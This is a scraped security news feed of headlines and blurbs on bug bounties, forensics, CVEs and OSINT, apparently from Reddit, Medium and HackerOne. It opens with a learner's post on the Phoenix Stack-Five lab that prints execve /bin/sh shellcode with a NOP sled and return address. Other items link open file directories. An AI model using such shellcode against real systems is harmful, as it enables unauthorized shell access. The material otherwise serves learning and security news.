    As I was going through protostar Phoenix Stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the nop sled is 80 characters long but when I have it 88 characters long I get a seg fault. This Works t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) ​ This gives a segfault t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) ​ Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount [link] [comments]
  • Open

    Backdooring WordPress using PyShell
    submitted by /u/jonas02 [link] [comments]
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer [link] [comments]
  • Open

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello Myself Manan Aggarwal a student from the BTech CSE is here to Present you the Blog about the All About the Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and access the app completely Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, Security Guys & Hacker In this Write Up I am Going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »
  • Open

    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Unrecoverable and recoverable windows file
    In my forensic image, some deleted files I can recover, some can not. How Encase determine which files are not recoverable internally? For data carving, how Encase retrieve internally those files, are they use same techniques compared with recover deleted files? thanks. submitted by /u/cyberfo [link] [comments]
    X-ways linux image analysis
    in X-ways, if I browse the root directory of image, i found free space, idle space and slack space, can anyone explain what's the different among these these three spaces? in filter attribute, there are SUID/SGID, symlink and special file. I thought suid file are special file, what are the special file X-ways refer to ? symlink means hardlink or soft link? submitted by /u/cyberfo [link] [comments]
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MobilEdit but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence [link] [comments]
  • Open

    [Cullinan #28] Add RPO and SSJI
    컬리넌 로그 #28입니다. 이번에는 RPO와 SSJI를 추가했고, 기존 항목들 일부 수정사항이 있었습니다. Add Relative Path Overwrite (RPO) Add Server-Side Javascript Injection (SSJI) Update SSRF (Add URL: Prefix) Update WebSocket Connection Smuggling (Add https payload) 이제 약간 미뤄왔던 큰 작업 하나를 해야할 것 같습니다. 다음에는 XSS 쪽 기존 포스팅을 싹 정리해서… 업데이트할 예정입니다 😅
  • Open

    Evading Network Defense with Protocol Manipulation
    Signature based intrusion detection or prevention systems, will detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…
  • Open

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture [link] [comments]
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh [link] [comments]
  • Open

    Question about protecting my data while traveling .
    Traveling a lot this week and was just wondering what kind of vpn you guys use while traveling and any other security measures you may have :) submitted by /u/Savage-shredder [link] [comments]
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had positive experience for US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede [link] [comments]
  • Open

    Cloudflare WAF bypass via Origin IP
    Cloudflare supports more than 16 million Internet attributes and is now one of the most popular WAFs(Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware?
    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware? submitted by /u/rvndomus3r2019 [link] [comments]
    Copying Hard Drive
    I am sending a hard drive I own into Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. ​ Thanks. submitted by /u/Odd-Switch-1658 [link] [comments]
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying [link] [comments]
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

    FreeBuf早报 | 英伟达71000名员工凭证泄露 ;政协委员建议设立网络安全和数据保护窗口
    英伟达发布了一份报告,承认攻击者从其系统中窃取了员工密码和未披露的英伟达专有信息。
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Açık kaynak istihbaratı : Fotoğraflardan ne buluruz?
    Tryhackme: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: Preso “influencer” digital após ser identificado fazendo dancinhas
    Imagina estar fazendo sua dancinha trend no TikoTeko e ser preso logo após? Pois foi o que aconteceu. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For for incorrectly]
    submitted by /u/yesyoucantrip [link] [comments]
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy [link] [comments]
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud [link] [comments]
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit [link] [comments]
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2 [link] [comments]
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra [link] [comments]
  • Open

    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how bluetooth is a vulnerability to the data that's being transferred over the connection but does it pose an actual threat to, lets say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05 [link] [comments]
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in the Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians bthrough reserving Airbnb's? submitted by /u/intentropy [link] [comments]
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey Everyone. Moderating this Subreddit throughout the past 6 or so months I have seen the topic come up quite a bit regarding utilization. While Metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that often cause issues with this requirement (IE Training on common security topics/trends/New Threat Landscapes) As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them push out. I'd be interested to hear others and their thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme [link] [comments]
    Dealing with impostor syndrome?
    Leaving it kinda brief, I have around 6 years in Security starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM. Scoping out deployments, talking to clients about what to log and understanding their requirements and how to change/modify their environments to match our services offerings etc. Anyway I took a "Security Architect" role at a big 5 firm and definitely realized I'm under prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience, I just feeling way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack [link] [comments]
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist [link] [comments]
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on workstations development team members use? We’ve pulled local admin rights from general employees years ago without much issue but every time we approach our dev teams to do it it’s just impossible as it too extremely inhibits their work as they legitimately need to do config management for locally installed services (eg IIS) and maybe less legitimately installing “development tools”. I’d add, we do have pro, qa, dev, sandbox environments but the devs still choose to do development on their desktop systems for “performance” reasons which there is some truth to as we give them beefy hardware (tons of ram/top end CPUs). Edit: after some good dialog here seems like common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this so chime in with any other thoughts/experience. submitted by /u/clayjk [link] [comments]
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What if anything should organisations be doing to protect themselves? submitted by /u/annonuk2020 [link] [comments]
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    Exposing the Trickbot Malware Gang - An OSINT Analysis
    Based on a yet another recently leaked batch of internal Trickbot malware gang's communication channels I've decided to come up with a proper OSINT analysis on the topic and actually enrich and actually enrich the original information data set including to elaborate more and provide actionable intelligence on the online whereabouts of the Trickbot malware gang's Internet-connected
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    Data URI(data:) XSS v2
    제가 오래전에 Data URI XSS를 다루는 “Form action + data:를 이용한 XSS Filtering 우회 기법“란 글을 쓴 적이 있었는데요, 오늘은 조금 더 개선된 버전으로 글을 작성해볼까 합니다. Data URI XSS v2 입니다. Portswigger XSS cheatsheet 및 대다수 cheatsheet에선 data:에 대해 잘 다루지 않습니다. embed tag에 대한 XSS도 javascript:alert()만 존재합니다. 과연 이것만 존재할까요? 아니죠 🤩 1 Data URI 우회 패턴을 더 만들기 위해선 이 Data URI에 대해서 좀 더 알아봐야겠죠?
  • Open

    steps to run before analyzing the iphone image
    steps to run before forensic analyze: turn off screenlock, turn off backup, turn off find my iphone, what else? submitted by /u/cyberfo [link] [comments]
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. Currently enrolled in Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714 [link] [comments]
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat [link] [comments]
    Interesting
    submitted by /u/kramps_ [link] [comments]
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB ÇÖZÜMLERİ
    WebSocket, client ile server arasında veri aktarımını sağlayan çift yönlü ve modern web uygulamalarında yaygın olarak kullanılan HTTP gibi… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB ÇÖZÜMLERİ
    Clickjacking, saldırgan tarafından web uygulamasında barındırılan zararlı bir bağlantıya, hedef kullanıcının tıklaması sonucunda çeşitli… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB ÇÖZÜMLERİ
    CORS (Cross-Origin Resource Sharing / Kökenler Arası Kaynak Paylaşımı), belli bir domainin dışındaki kaynaklara kontrollü erişim sağlayan… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    FreeBuf周报 | 英伟达多达1TB数据被盗;丰田因供应商遭受网络攻击而停产
    总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    Avast 为袭击乌克兰的HermeticRansom发布了免费解密工具
    近日,Avast发布了免费的HermeticRansom勒索软件解密工具,只为帮助遭受勒索威胁的乌克兰受害者恢复数据。
    论一次在简单的渗透测试
    一次简单渗透测试的总结
    国家网信办发布《互联网弹窗信息推送服务管理规定(征求意见稿)》
    《规定》明确指出,在我国境内提供操作系统、终端设备、应用软件、网站等服务的,开展互联网弹窗信息推送服务时应当遵守本规定。

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest I9-12900k CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and cellabrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDS, and M.2 SSD’s. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before). I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi how can I investigate executed malicious file like maldoc or any execruable. How to get the list of artificates? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted file? if yes, do we need to root the iphone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    Computer Evidence RecoveryThe Truth About USB Device Serial Numbers – (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic reports says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT meydan okumaki
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks — Tras CVE´s , Fotos y Controladores de Tanques de Gasolineras.
    Cualquier amante de la ciberseguridad conoce el motor de búsqueda Shodan, pero ¿sabrías utilizar los parámetros adecuados para “Dorkear… Continue reading on Medium »
    Un apasionado de la ciberseguridad y ciberinteligencia con muchas cosas que contarte.
    ¿Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPOLRE HIDDEN FILES) Continue reading on Medium »
  • Open

    Ukrayna’nın Siber Savunması Hacken’ın Rolü: Dyma Budorin ile En Son AMA
    Hacken ekibi kısa süre önce, Rusya’nın Ukrayna’yı işgalinin başlangıcından bu yana CEO’muz Dyma Budorin ile ilk AMA oturumunu düzenledi… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    An Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ ​ https://simpsons.porn/assets/images/ ​ http://edmazur.com/images/funny/ ​ http://fricking.ninja/Media/photo_comments/mp4/ ​ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ ​ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3. 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE but no idea why I keep getting a red message in chrome when i try to go to websites i normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background possesses. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shut down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can effect me in anyway, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
    I mean if the websited forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and was 127.0.0.1 suspiciousaddress. I checked the address on web scanners and said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didnt wrote it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? ​ Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget . Need recommendations regarding easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 开源 PJSIP 库受到关键漏洞影响 ;工信部公布规定限制 APP 下载行为
    在俄乌冲突升级背景下,美国参议院选择一致通过《加强美国网络安全法》。
    如何预防钓鱼邮件?SMIME邮件安全证书来支招!
    网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼式攻击),通过冒充银行或其他知名机构向受害者发送欺骗性邮件,引诱收信人提供自己的敏感信息(如用户名、口令、ATM交易密码或
    风险上升!数据泄露和影子资产致企业网络攻击面扩大
    数据泄漏和影子资产是全球大型组织面临网络攻击的最大来源。
    游戏玩家注意了!黑客正传播可劫持社交媒体账户的恶意软件
    它主要通过微软的应用商店以计算机木马游戏应用程序的形式入侵。
    俄罗斯认为对其卫星发动网络攻击是战争行为,但入侵乌克兰不算
    隶属于匿名者的黑客组织宣布关闭俄罗斯航天局的控制中心。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    俄罗斯总统普京宣布在乌克兰东部的顿巴斯地区进行特别军事行动。除了现实热战争以外,俄罗斯-乌克兰之间的“网络战”其实早已拉开序幕。
    MITRE对手交战框架V1及一系列落地指导文件发布
    给积极防御人员的对手交战指导建议
    CIS 2021大会·春日版启动线下录制,阳春相聚话安全
    3月2日上午,为期两天的「CIS 2021网络安全创新大会Spring·春日版」在上海宝华万豪酒店开启线下录制。
    新招数!BO彩平台支付通道新趋势,虚拟货币成“新宠”
